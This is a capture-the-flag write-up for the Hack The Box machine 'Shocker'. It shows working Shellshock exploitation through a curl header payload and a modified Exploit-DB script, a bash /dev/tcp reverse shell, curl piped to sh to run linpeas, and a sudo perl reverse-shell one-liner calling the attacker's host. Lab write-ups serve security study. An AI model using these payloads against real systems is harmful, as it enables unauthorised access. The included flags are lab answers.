# Reconnaissance

```bash
# Automatic tools
# nmapAutomator (https://github.com/21y4d/nmapAutomator)
cd /usr/local/bin/
sudo ./nmapAutomator.sh --host 10.10.10.56 --type All
# Nmap
nmap -sV -sC -A 10.10.10.56 -Pn
```

```txt
┌──(kali㉿kali)-[~/Desktop/HackTheBox/Shocker]
└─$ nmap -sV -sC -A 10.10.10.56 -Pn

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-05 17:44 CST
Nmap scan report for 10.10.10.56
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.65 seconds

```
# Enumeration
## Enumerate 80 http

we will see there is an HTTP service on that port.

![[Shocker-1.png]]

we try use gobuster to enumerate the folder.

```bash
# small list
gobuster dir -e -u http://10.10.10.56 -w /usr/share/wordlists/dirb/big.txt -t 20
# if small list found nothing, try biglist
gobuster dir -e -u http://10.10.10.56 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
```

```txt
┌──(kali㉿kali)-[~/Desktop/HackTheBox/Shocker]
└─$ gobuster dir -e -u http://10.10.10.56 -w /usr/share/wordlists/dirb/big.txt -t 20

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2022/06/05 18:00:28 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.56/.htaccess            (Status: 403) [Size: 295]
http://10.10.10.56/.htpasswd            (Status: 403) [Size: 295]
http://10.10.10.56/cgi-bin/             (Status: 403) [Size: 294]
http://10.10.10.56/server-status        (Status: 403) [Size: 299]
                                                                 
===============================================================
2022/06/05 18:06:00 Finished
===============================================================
```

The cgi-bin folder is an indication that the system could be vulnerable to Shellshock. Fuzzing for the extensions cgi, sh, pl, py get us the following results.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Running another Gobuster scan against cgi-bin user.sh is found:

```bash
gobuster dir -e -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x cgi,py,pl,php,sh
# output
http://10.10.10.56/cgi-bin/user.sh
```

![[Shocker-2.png]]

then we download http://10.10.10.56/cgi-bin/user.sh and check the contents

```bash
wget http://10.10.10.56/cgi-bin/user.sh
cat user.sh
```

```txt
Content-Type: text/plain

Just an uptime test script

 11:42:57 up  6:08,  0 users,  load average: 0.02, 0.02, 0.00

```

## Enumerate 2222 ssh

```bash
searchsploit 7.2p2
```

we didn't find any useful information.

# Exploitation
## Exploit on shellshock
Shellhock is a Linux security vulnerability that could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. 

https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf

one-liner exploit 
```bash
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://10.10.10.56/cgi-bin/user.sh
```

![[Shocker-6.png]]

Using SearchSploit to find Shellshock-related explotis:

```bash
searchsploit shellshock
searchsploit -m 34900 
```

And run the exploit

```bash
python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.11 lport=3333
```

![[Shocker-3.png]]

Running the script with the required parameters (payload, rhost, lhost and lport), the script is run against a number of common directories and scripts.

But we didn't get the shell. Why? Do you remember cgi-bin/user.sh file? Let's try alter the exploit python script by add /cgi-bin/user.sh

```python
# original
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]
# new
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv","/cgi-bin/user.sh"]
```

And exploit the machine again, we get the shell !
```bash
python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.11 lport=3333
```
```bash
whoami
hostname
ifconfig
```

![[Shocker-4.png]]

## Get the user flag

```bash
cat /home/shelly/user.txt
# flag
2ec24e11320026d1e70ff3e16695b233
```

![[Shocker-5.png]]

## Shell Upgrade
We have got a shell let us upgrade it to fully qualified Linux shell so that we can run more **advanced Linux command** on it.

we create a another reverse shell, by google "reverse shell cheat sheet"

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

```bash
nc -lvp 4444 
bash -i >& /dev/tcp/10.10.14.12/4444 0>&1
```
![[Shocker-8.png]]


# Privilege Escalation
## Privesc by linpeas.sh
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
```bash
# donwload to kali linux
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh
# build up http server
python3 -m http.server 80
# download linpeas.sh from kali and pipe to run with bash
cd /home/shelly
curl 10.10.14.12/linpeas.sh | sh
```
![[Shocker-9.png]]

![[Shocker-10.png]]
we will find shelly could run /usr/bin/perl as root user:

```bash
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
```

we know we are in shelly user now, so we try create a another perl reverse shell to our kali machine.

```bash
nc -vlp 1234
# create perl reverse shell
sudo perl -e 'use Socket;$i="10.10.14.12";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

## Get the root flag
```bash
whoami
cat /root/root.txt
# flag
52c2715605d70c7619030560dc1ca467
```
![[Shocker-13.png]]
![[Shocker-11.png]]